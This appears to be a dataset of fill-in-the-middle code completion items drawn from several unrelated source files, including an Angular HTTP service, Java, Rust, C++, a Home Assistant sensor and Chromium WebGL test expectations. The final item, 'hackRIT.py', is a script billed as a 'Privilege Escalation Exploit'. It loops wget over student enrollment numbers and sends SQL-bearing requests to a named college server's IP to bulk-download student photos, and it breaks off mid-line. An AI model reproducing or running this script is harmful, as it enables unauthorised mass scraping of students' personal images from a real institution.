prompt
large_stringlengths
70
991k
completion
large_stringlengths
0
1.02k
<|file_name|>http.js<|end_file_name|><|fim▁begin|>(function () { 'use strict'; angular.module('metronome.services.http', ['angular-jwt']) .factory('http', ['$http', 'CONFIG', 'jwtHelper', function($http, CONFIG, jwtHelper) { var token = Cookies.get('token'); var now = moment(); var expirationdate = moment(jwtHelper.getTokenExpirationDate(token)).subtract(1, 'm'); if (now.isAfter(expirationdate)) { $http({ method: 'POST', url: CONFIG.api + "/auth", data: JSON.stringify({ type: "access", refreshToken: Cookies.get("refreshToken") }) }).then(function successCallback(response) { Cookies.set('token', response.data.token); }, function errorCallback(response) {<|fim▁hole|> token = Cookies.get('token'); return function(config) { return $http(angular.extend({ headers: { 'Authorization': token }, url: CONFIG.api + config.path }, config)); }; }]); })();<|fim▁end|>
console.log("Error on call to renew accessToken:", response) }); }
<|file_name|>OFOxmBsnInPorts128.java<|end_file_name|><|fim▁begin|>// Copyright (c) 2008 The Board of Trustees of The Leland Stanford Junior University // Copyright (c) 2011, 2012 Open Networking Foundation // Copyright (c) 2012, 2013 Big Switch Networks, Inc. // This library was generated by the LoxiGen Compiler. // See the file LICENSE.txt which should have been included in the source distribution // Automatically generated by LOXI from template of_interface.java // Do not modify package org.projectfloodlight.openflow.protocol.oxm; import org.projectfloodlight.openflow.protocol.*;<|fim▁hole|>import org.projectfloodlight.openflow.protocol.errormsg.*; import org.projectfloodlight.openflow.protocol.meterband.*; import org.projectfloodlight.openflow.protocol.instruction.*; import org.projectfloodlight.openflow.protocol.instructionid.*; import org.projectfloodlight.openflow.protocol.match.*; import org.projectfloodlight.openflow.protocol.stat.*; import org.projectfloodlight.openflow.protocol.oxm.*; import org.projectfloodlight.openflow.protocol.oxs.*; import org.projectfloodlight.openflow.protocol.queueprop.*; import org.projectfloodlight.openflow.types.*; import org.projectfloodlight.openflow.util.*; import org.projectfloodlight.openflow.exceptions.*; import io.netty.buffer.ByteBuf; public interface OFOxmBsnInPorts128 extends OFObject, OFOxm<OFBitMask128> { long getTypeLen(); OFBitMask128 getValue(); MatchField<OFBitMask128> getMatchField(); boolean isMasked(); OFOxm<OFBitMask128> getCanonical(); OFBitMask128 getMask(); OFVersion getVersion(); void writeTo(ByteBuf channelBuffer); Builder createBuilder(); public interface Builder extends OFOxm.Builder<OFBitMask128> { OFOxmBsnInPorts128 build(); long getTypeLen(); OFBitMask128 getValue(); Builder setValue(OFBitMask128 value); MatchField<OFBitMask128> getMatchField(); boolean isMasked(); OFOxm<OFBitMask128> getCanonical(); OFBitMask128 getMask(); OFVersion getVersion(); } }<|fim▁end|>
import org.projectfloodlight.openflow.protocol.action.*; import org.projectfloodlight.openflow.protocol.actionid.*; import org.projectfloodlight.openflow.protocol.bsntlv.*;
<|file_name|>sensor.py<|end_file_name|><|fim▁begin|>"""Support for the Italian train system using ViaggiaTreno API.""" import asyncio import logging import time import aiohttp import async_timeout<|fim▁hole|>import voluptuous as vol from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity from homeassistant.const import ATTR_ATTRIBUTION, HTTP_OK, TIME_MINUTES import homeassistant.helpers.config_validation as cv _LOGGER = logging.getLogger(__name__) ATTRIBUTION = "Powered by ViaggiaTreno Data" VIAGGIATRENO_ENDPOINT = ( "http://www.viaggiatreno.it/viaggiatrenonew/" "resteasy/viaggiatreno/andamentoTreno/" "{station_id}/{train_id}/{timestamp}" ) REQUEST_TIMEOUT = 5 # seconds ICON = "mdi:train" MONITORED_INFO = [ "categoria", "compOrarioArrivoZeroEffettivo", "compOrarioPartenzaZeroEffettivo", "destinazione", "numeroTreno", "orarioArrivo", "orarioPartenza", "origine", "subTitle", ] DEFAULT_NAME = "Train {}" CONF_NAME = "train_name" CONF_STATION_ID = "station_id" CONF_STATION_NAME = "station_name" CONF_TRAIN_ID = "train_id" ARRIVED_STRING = "Arrived" CANCELLED_STRING = "Cancelled" NOT_DEPARTED_STRING = "Not departed yet" NO_INFORMATION_STRING = "No information for this train now" PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_TRAIN_ID): cv.string, vol.Required(CONF_STATION_ID): cv.string, vol.Optional(CONF_NAME): cv.string, } ) async def async_setup_platform(hass, config, async_add_entities, discovery_info=None): """Set up the ViaggiaTreno platform.""" train_id = config.get(CONF_TRAIN_ID) station_id = config.get(CONF_STATION_ID) if not (name := config.get(CONF_NAME)): name = DEFAULT_NAME.format(train_id) async_add_entities([ViaggiaTrenoSensor(train_id, station_id, name)]) async def async_http_request(hass, uri): """Perform actual request.""" try: session = hass.helpers.aiohttp_client.async_get_clientsession(hass) with async_timeout.timeout(REQUEST_TIMEOUT): req = await session.get(uri) if req.status != HTTP_OK: return {"error": req.status} json_response = await req.json() return json_response except (asyncio.TimeoutError, aiohttp.ClientError) as exc: _LOGGER.error("Cannot connect to ViaggiaTreno API endpoint: %s", exc) except ValueError: _LOGGER.error("Received non-JSON data from ViaggiaTreno API endpoint") class ViaggiaTrenoSensor(SensorEntity): """Implementation of a ViaggiaTreno sensor.""" def __init__(self, train_id, station_id, name): """Initialize the sensor.""" self._state = None self._attributes = {} self._unit = "" self._icon = ICON self._station_id = station_id self._name = name self.uri = VIAGGIATRENO_ENDPOINT.format( station_id=station_id, train_id=train_id, timestamp=int(time.time()) * 1000 ) @property def name(self): """Return the name of the sensor.""" return self._name @property def native_value(self): """Return the state of the sensor.""" return self._state @property def icon(self): """Icon to use in the frontend, if any.""" return self._icon @property def native_unit_of_measurement(self): """Return the unit of measurement.""" return self._unit @property def extra_state_attributes(self): """Return extra attributes.""" self._attributes[ATTR_ATTRIBUTION] = ATTRIBUTION return self._attributes @staticmethod def has_departed(data): """Check if the train has actually departed.""" try: first_station = data["fermate"][0] if data["oraUltimoRilevamento"] or first_station["effettiva"]: return True except ValueError: _LOGGER.error("Cannot fetch first station: %s", data) return False @staticmethod def has_arrived(data): """Check if the train has already arrived.""" last_station = data["fermate"][-1] if not last_station["effettiva"]: return False return True @staticmethod def is_cancelled(data): """Check if the train is cancelled.""" if data["tipoTreno"] == "ST" and data["provvedimento"] == 1: return True return False async def async_update(self): """Update state.""" uri = self.uri res = await async_http_request(self.hass, uri) if res.get("error", ""): if res["error"] == 204: self._state = NO_INFORMATION_STRING self._unit = "" else: self._state = "Error: {}".format(res["error"]) self._unit = "" else: for i in MONITORED_INFO: self._attributes[i] = res[i] if self.is_cancelled(res): self._state = CANCELLED_STRING self._icon = "mdi:cancel" self._unit = "" elif not self.has_departed(res): self._state = NOT_DEPARTED_STRING self._unit = "" elif self.has_arrived(res): self._state = ARRIVED_STRING self._unit = "" else: self._state = res.get("ritardo") self._unit = TIME_MINUTES self._icon = ICON<|fim▁end|>
<|file_name|>14 circle function.py<|end_file_name|><|fim▁begin|>def circle(cx, cy, diameter): radius = diameter / 2<|fim▁hole|> # diameter = 254 # radius = diameter / 2 # cx, cy = (420, 532) # oval(cx - radius, cy - radius, diameter, diameter) circle(420, 532, 254) # diameter = 154 # radius = diameter / 2 # cx, cy = (728, 414) # oval(cx - radius, cy - radius, diameter, diameter) circle(728, 414, 154) circle(510, 258, 306)<|fim▁end|>
oval(cx - radius, cy - radius, diameter, diameter)
<|file_name|>connect.js<|end_file_name|><|fim▁begin|>const ircFramework = require('irc-framework') const store = require('../store') const attachEvents = require('./attachEvents') const connect = connection => { const state = store.getState() let ircClient = state.ircClients[connection.id] if (!ircClient) { ircClient = new ircFramework.Client({<|fim▁hole|> port: connection.port, tls: connection.tls, username: connection.username || connection.nick, password: connection.password, // "Not enough parameters" with empty gecos so a space is used. gecos: connection.gecos || ' ', // Custom auto reconnect mechanism is implemented, see events/connection.js. auto_reconnect: false, }) attachEvents(ircClient, connection.id) store.dispatch({ type: 'SET_IRC_CLIENT', payload: { connectionId: connection.id, ircClient, }, }) } ircClient.connect() } module.exports = connect<|fim▁end|>
nick: connection.nick, host: connection.host,
<|file_name|>separateOddsAndEvens.cpp<|end_file_name|><|fim▁begin|>#include <iostream> #include <vector> using namespace std; void separateOddsAndEvens(const vector<int>& arr, vector<int>& odds, vector<int>& evens); void printVector(const vector<int>& vec); int main() { vector<int> arrUnsplit = {1,2,3,4,5,6,7,8,9,10}; vector<int> odds, evens; cout << "main array is: " << endl; printVector(arrUnsplit); separateOddsAndEvens(arrUnsplit, odds, evens); cout << "odds is: " << endl; printVector(odds); cout << "evens is: " << endl; printVector(evens); return 0; } void separateOddsAndEvens(const vector<int>& arr, vector<int>& odds, vector<int>& evens) { int numodds = 0, numevens = 0; for(auto& i : arr) { if(i % 2 == 1) { numodds++; } else { numevens++; } } odds.reserve(numodds); evens.reserve(numevens); for(auto& i : arr) { if(i % 2 == 1) { odds.push_back(i); } else { evens.push_back(i); } } } void printVector(const vector<int>& vec) { cout << "["; for(auto& i : vec) { cout << i << ", "; } cout << "]" << endl;<|fim▁hole|><|fim▁end|>
}
<|file_name|>max_test.py<|end_file_name|><|fim▁begin|>from .max import max<|fim▁hole|> def max_test(): assert_equal(max([1, 3, 4, 2]), 4)<|fim▁end|>
from pyramda.private.asserts import assert_equal
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// See LICENSE file for copyright and license details.<|fim▁hole|>pub mod dir; pub mod fs; pub mod game_state; pub mod map; pub mod misc; pub mod pathfinder; pub mod types; // vim: set tabstop=4 shiftwidth=4 softtabstop=4 expandtab:<|fim▁end|>
pub mod conf; pub mod core;
<|file_name|>volumetric_repr.rs<|end_file_name|><|fim▁begin|>use na::{Pnt2, Iso2, Pnt3, Mat3, Iso3, Mat1}; use ncollide::shape::{Ball, Cone, Cylinder, Convex3, Cuboid2, Cuboid3, Compound2, Compound3}; use ncollide::inspection::Repr; use ncollide::math::Scalar; use volumetric::Volumetric; macro_rules! dispatch( ($p: ty, $i: ty, $compound: ty, $convex: ty, $cuboid: ty, $sself: ident.$name: ident($($argN: ident),*)) => { { let repr = $sself.repr(); if let Some(b) = repr.downcast_ref::<Ball<N>>() { (b as &Volumetric<N, $p, $i>).$name($($argN,)*) }<|fim▁hole|> else if let Some(c) = repr.downcast_ref::<Cone<N>>() { (c as &Volumetric<N, $p, $i>).$name($($argN,)*) } else if let Some(c) = repr.downcast_ref::<$convex>() { c.$name($($argN,)*) } else if let Some(c) = repr.downcast_ref::<$cuboid>() { c.$name($($argN,)*) } else if let Some(c) = repr.downcast_ref::<Cylinder<N>>() { (c as &Volumetric<N, $p, $i>).$name($($argN,)*) } else { /* * XXX: dispatch by custom type. */ panic!("The `Volumetric` is not implemented by the given shape.") } } } ); impl<N> Volumetric<N, Pnt2<N>, Mat1<N>> for Repr<Pnt2<N>, Iso2<N>> where N: Scalar { fn surface(&self) -> N { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.surface()) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } fn volume(&self) -> N { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.volume()) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } fn center_of_mass(&self) -> Pnt2<N> { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.center_of_mass()) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } fn unit_angular_inertia(&self) -> Mat1<N> { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.unit_angular_inertia()) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } fn mass_properties(&self, density: N) -> (N, Pnt2<N>, Mat1<N>) { dispatch!(Pnt2<N>, Mat1<N>, Compound2<N>, Cuboid2<N>/* Convex2<N> */, Cuboid2<N>, self.mass_properties(density)) // XXX: ^^^^^^^^^^ // Change this when Volumetric is implemented for 2D convex. } } impl<N> Volumetric<N, Pnt3<N>, Mat3<N>> for Repr<Pnt3<N>, Iso3<N>> where N: Scalar { fn surface(&self) -> N { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.surface()) } fn volume(&self) -> N { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.volume()) } fn center_of_mass(&self) -> Pnt3<N> { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.center_of_mass()) } fn unit_angular_inertia(&self) -> Mat3<N> { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.unit_angular_inertia()) } fn mass_properties(&self, density: N) -> (N, Pnt3<N>, Mat3<N>) { dispatch!(Pnt3<N>, Mat3<N>, Compound3<N>, Convex3<N>, Cuboid3<N>, self.mass_properties(density)) } }<|fim▁end|>
else if let Some(c) = repr.downcast_ref::<$compound>() { c.$name($($argN,)*) }
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># # Copyright (C) 2014 Mathias Weber <[email protected]> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution.<|fim▁hole|># THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF # THE POSSIBILITY OF SUCH DAMAGE. # from user import * from event import *<|fim▁end|>
#
<|file_name|>cstore.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // The crate store - a central repo for information collected about external // crates and libraries use metadata::cstore; use metadata::decoder; use std::hashmap::HashMap; use extra; use syntax::ast; use syntax::parse::token::ident_interner; // A map from external crate numbers (as decoded from some crate file) to // local crate numbers (as generated during this session). Each external // crate may refer to types in other external crates, and each has their // own crate numbers. pub type cnum_map = @mut HashMap<ast::crate_num, ast::crate_num>; pub struct crate_metadata { name: @str, data: @~[u8], cnum_map: cnum_map, cnum: ast::crate_num } pub struct CStore { priv metas: HashMap <ast::crate_num, @crate_metadata>, priv extern_mod_crate_map: extern_mod_crate_map, priv used_crate_files: ~[Path], priv used_libraries: ~[@str], priv used_link_args: ~[@str], intr: @ident_interner } // Map from node_id's of local extern mod statements to crate numbers type extern_mod_crate_map = HashMap<ast::node_id, ast::crate_num>; pub fn mk_cstore(intr: @ident_interner) -> CStore { return CStore { metas: HashMap::new(), extern_mod_crate_map: HashMap::new(), used_crate_files: ~[], used_libraries: ~[], used_link_args: ~[], intr: intr }; } pub fn get_crate_data(cstore: &CStore, cnum: ast::crate_num) -> @crate_metadata { return *cstore.metas.get(&cnum); } pub fn get_crate_hash(cstore: &CStore, cnum: ast::crate_num) -> @str { let cdata = get_crate_data(cstore, cnum); decoder::get_crate_hash(cdata.data) } pub fn get_crate_vers(cstore: &CStore, cnum: ast::crate_num) -> @str { let cdata = get_crate_data(cstore, cnum); decoder::get_crate_vers(cdata.data) } pub fn set_crate_data(cstore: &mut CStore, cnum: ast::crate_num, data: @crate_metadata) { cstore.metas.insert(cnum, data); } pub fn have_crate_data(cstore: &CStore, cnum: ast::crate_num) -> bool { cstore.metas.contains_key(&cnum) } pub fn iter_crate_data(cstore: &CStore, i: &fn(ast::crate_num, @crate_metadata)) { for cstore.metas.iter().advance |(&k, &v)| { i(k, v); } } pub fn add_used_crate_file(cstore: &mut CStore, lib: &Path) { if !cstore.used_crate_files.contains(lib) { cstore.used_crate_files.push(copy *lib); } }<|fim▁hole|>} pub fn add_used_library(cstore: &mut CStore, lib: @str) -> bool { assert!(!lib.is_empty()); if cstore.used_libraries.iter().any_(|x| x == &lib) { return false; } cstore.used_libraries.push(lib); true } pub fn get_used_libraries<'a>(cstore: &'a CStore) -> &'a [@str] { let slice: &'a [@str] = cstore.used_libraries; slice } pub fn add_used_link_args(cstore: &mut CStore, args: &str) { for args.split_iter(' ').advance |s| { cstore.used_link_args.push(s.to_managed()); } } pub fn get_used_link_args<'a>(cstore: &'a CStore) -> &'a [@str] { let slice: &'a [@str] = cstore.used_link_args; slice } pub fn add_extern_mod_stmt_cnum(cstore: &mut CStore, emod_id: ast::node_id, cnum: ast::crate_num) { cstore.extern_mod_crate_map.insert(emod_id, cnum); } pub fn find_extern_mod_stmt_cnum(cstore: &CStore, emod_id: ast::node_id) -> Option<ast::crate_num> { cstore.extern_mod_crate_map.find(&emod_id).map_consume(|x| *x) } // returns hashes of crates directly used by this crate. Hashes are sorted by // (crate name, crate version, crate hash) in lexicographic order (not semver) pub fn get_dep_hashes(cstore: &CStore) -> ~[@str] { struct crate_hash { name: @str, vers: @str, hash: @str } let mut result = ~[]; for cstore.extern_mod_crate_map.each_value |&cnum| { let cdata = cstore::get_crate_data(cstore, cnum); let hash = decoder::get_crate_hash(cdata.data); let vers = decoder::get_crate_vers(cdata.data); debug!("Add hash[%s]: %s %s", cdata.name, vers, hash); result.push(crate_hash { name: cdata.name, vers: vers, hash: hash }); } let sorted = do extra::sort::merge_sort(result) |a, b| { (a.name, a.vers, a.hash) <= (b.name, b.vers, b.hash) }; debug!("sorted:"); for sorted.iter().advance |x| { debug!(" hash[%s]: %s", x.name, x.hash); } sorted.map(|ch| ch.hash) }<|fim▁end|>
pub fn get_used_crate_files(cstore: &CStore) -> ~[Path] { return /*bad*/copy cstore.used_crate_files;
<|file_name|>export-non-interference3.rs<|end_file_name|><|fim▁begin|>// xfail-fast<|fim▁hole|>// file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. pub mod foo { pub fn x() { ::bar::x(); } } pub mod bar { pub fn x() { debug!("x"); } } pub fn main() { foo::x(); }<|fim▁end|>
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
<|file_name|>webgl_conformance_expectations.py<|end_file_name|><|fim▁begin|># Copyright (c) 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from telemetry.page import test_expectations # Valid expectation conditions are: # # Operating systems: # win, xp, vista, win7, mac, leopard, snowleopard, lion, mountainlion, # linux, chromeos, android # # GPU vendors: # amd, arm, broadcom, hisilicon, intel, imagination, nvidia, qualcomm, # vivante # # Specific GPUs can be listed as a tuple with vendor name and device ID. # Examples: ('nvidia', 0x1234), ('arm', 'Mali-T604') # Device IDs must be paired with a GPU vendor. class WebGLConformanceExpectations(test_expectations.TestExpectations): def SetExpectations(self): # Sample Usage: # self.Fail('gl-enable-vertex-attrib.html', # ['mac', 'amd', ('nvidia', 0x1234)], bug=123) # Fails everywhere. self.Skip('conformance/glsl/misc/large-loop-compile.html', bug=322764) self.Skip('conformance/textures/texture-size-limit.html', bug=322789) # Windows failures. self.Fail('conformance/ogles/GL/atan/atan_001_to_008.html', ['win'], bug=322794) self.Fail('conformance/ogles/GL/atan/atan_009_to_012.html', ['win'], bug=322794) self.Skip('conformance/ogles/GL/control_flow/control_flow_001_to_008.html', ['win'], bug=322795) # Windows/Intel failures self.Fail('conformance/textures/texture-size.html', ['win', 'intel'], bug=121139) self.Fail('conformance/rendering/gl-scissor-test.html', ['win', 'intel'], bug=314997) # Windows/AMD failures self.Fail('conformance/rendering/more-than-65536-indices.html', ['win', 'amd'], bug=314997) # Windows 7/Intel failures self.Fail('conformance/context/context-lost-restored.html', ['win7', 'intel']) self.Fail('conformance/context/premultiplyalpha-test.html', ['win7', 'intel']) self.Fail('conformance/extensions/oes-texture-float-with-image-data.html', ['win7', 'intel']) self.Fail('conformance/extensions/oes-texture-float.html', ['win7', 'intel']) self.Fail('conformance/limits/gl-min-attribs.html', ['win7', 'intel']) self.Fail('conformance/limits/gl-max-texture-dimensions.html', ['win7', 'intel']) self.Fail('conformance/limits/gl-min-textures.html', ['win7', 'intel']) self.Fail('conformance/limits/gl-min-uniforms.html', ['win7', 'intel']) self.Fail('conformance/rendering/gl-clear.html', ['win7', 'intel']) self.Fail('conformance/textures/copy-tex-image-and-sub-image-2d.html', ['win7', 'intel']) self.Fail('conformance/textures/gl-teximage.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-array-buffer-view.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-image-data.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgb565.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgba4444.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgba5551.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-image-with-format-and-type.html', ['win7', 'intel']) self.Fail('conformance/textures/tex-sub-image-2d.html', ['win7', 'intel']) self.Fail('conformance/textures/texparameter-test.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-active-bind-2.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-active-bind.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-complete.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-formats-test.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-mips.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-npot.html', ['win7', 'intel']) self.Fail('conformance/textures/texture-size-cube-maps.html', ['win7', 'intel']) self.Fail('conformance/context/context-attribute-preserve-drawing-buffer.html', ['win7', 'intel'], bug=322770) # Mac failures. self.Fail('conformance/glsl/misc/shaders-with-varyings.html', ['mac'], bug=322760) self.Fail('conformance/context/context-attribute-preserve-drawing-buffer.html', ['mac'], bug=322770) self.Skip('conformance/ogles/GL/control_flow/control_flow_001_to_008.html', ['mac'], bug=322795) # Mac/Intel failures self.Fail('conformance/rendering/gl-scissor-test.html', ['mac', 'intel'], bug=314997) # The following two tests hang the WindowServer. self.Skip('conformance/canvas/drawingbuffer-static-canvas-test.html', ['mac', 'intel'], bug=303915) self.Skip('conformance/canvas/drawingbuffer-test.html', ['mac', 'intel'], bug=303915) # The following three tests only fail. # Radar 13499677 self.Fail( 'conformance/glsl/functions/glsl-function-smoothstep-gentype.html', ['mac', 'intel'], bug=225642) # Radar 13499466 self.Fail('conformance/limits/gl-max-texture-dimensions.html', ['mac', 'intel'], bug=225642) # Radar 13499623 self.Fail('conformance/textures/texture-size.html', ['mac', 'intel'], bug=225642) self.Skip('conformance/ogles/GL/control_flow/control_flow_009_to_010.html', ['mac', 'intel'], bug=322795) self.Fail('conformance/ogles/GL/operators/operators_009_to_016.html',<|fim▁hole|> ['mac', 'intel'], bug=322795) # Mac/Intel failures on 10.7 self.Skip('conformance/glsl/functions/glsl-function-asin.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-dot.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-faceforward.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-length.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-normalize.html', ['lion', 'intel']) self.Skip('conformance/glsl/functions/glsl-function-reflect.html', ['lion', 'intel']) self.Skip( 'conformance/glsl/functions/glsl-function-smoothstep-gentype.html', ['lion', 'intel']) self.Skip('conformance/limits/gl-max-texture-dimensions.html', ['lion', 'intel']) self.Skip('conformance/rendering/line-loop-tri-fan.html', ['lion', 'intel']) self.Skip('conformance/ogles/GL/control_flow/control_flow_009_to_010.html', ['lion'], bug=322795) self.Skip('conformance/ogles/GL/dot/dot_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/faceforward/faceforward_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/length/length_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/normalize/normalize_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/reflect/reflect_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/refract/refract_001_to_006.html', ['lion', 'intel'], bug=323736) self.Skip('conformance/ogles/GL/tan/tan_001_to_006.html', ['lion', 'intel'], bug=323736) # Mac/ATI failures self.Skip('conformance/extensions/oes-texture-float-with-image-data.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/rendering/gl-clear.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-array-buffer-view.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-image-data.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgb565.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgba4444.html', ['mac', 'amd'], bug=308328) self.Skip('conformance/textures/tex-image-and-sub-image-2d-with-image-data-rgba5551.html', ['mac', 'amd'], bug=308328) self.Fail('conformance/canvas/drawingbuffer-test.html', ['mac', 'amd'], bug=314997) # Linux/NVIDIA failures self.Fail('conformance/glsl/misc/empty_main.vert.html', ['linux', ('nvidia', 0x1040)], bug=325884) self.Fail('conformance/glsl/misc/gl_position_unset.vert.html', ['linux', ('nvidia', 0x1040)], bug=325884) self.Fail('conformance/uniforms/uniform-location.html', ['linux', ('nvidia', 0x1040)], bug=325884) # Android failures self.Fail('conformance/textures/texture-npot-video.html', ['android'], bug=306485) # The following test is very slow and therefore times out on Android bot. self.Skip('conformance/rendering/multisample-corruption.html', ['android']) self.Fail('conformance/canvas/drawingbuffer-test.html', ['android'], bug=314997) self.Fail('conformance/glsl/misc/empty_main.vert.html', ['android'], bug=315976) self.Fail('conformance/glsl/misc/gl_position_unset.vert.html', ['android'], bug=315976) # Skip slow tests. self.Skip('conformance/context/context-creation-and-destruction.html', bug=322689) self.Skip('conformance/rendering/multisample-corruption.html', bug=322689)<|fim▁end|>
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os #Decoration Starts print """ +=============================================================+ || Privilege Escalation Exploit || || +===================================================+ || || | _ _ _ ____ _ __ ____ ___ _____ | || || | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | || || | | |_| | / _ \| | | ' / | |_) || | | | | || || | | _ |/ ___ \ |___| . \ | _ < | | | | | || || | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | || || | | || || +===================================================+ || || ~ by Yadnyawalkya Tale ([email protected]) ~ || +=============================================================+ """ #Decoration Ends # Class according to Year Input <|fim▁hole|>if year_input == 1: year_choice = 1300000 #Final Year elif year_input == 2: year_choice = 1400000 #Third Year elif year_input == 3: year_choice = 1500000 #Second Year elif year_input == 4: year_choice = 1600000 #First Year # Department Class Input print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech" class_input = input() if class_input == 1: class_choice = 1000 #Automobile Department elif class_input == 2: class_choice = 2000 #Civil Department elif class_input == 3: class_choice = 3000 #ComputerScience Department elif class_input == 4: class_choice = 4000 #InformationTechnology Department elif class_input == 5: class_choice = 5000 #ETC Department elif class_input == 6: class_choice = 8000 #Electrial Department elif class_input == 7: class_choice = 6000 #Mechanical Department startflag = year_choice + class_choice #For eg. Start @ 1303000 if class_input == 7: endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;) else: endflag = year_choice + class_choice + 70 #For eg. End @ 1303070 os.system("mkdir ritphotos") decoration="=" while startflag < endflag: startflag = startflag + 1 cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag) os.system(cmd1) decoration = "=" + decoration print "{0}".format(decoration) print "100%\tPlease Wait..." pstartflag = year_choice + class_choice + 150000 if class_input == 7: pendflag = year_choice + class_choice + 40 + 150000 #For All branches else: pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;) while pstartflag < pendflag: pstartflag = pstartflag + 1 cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null 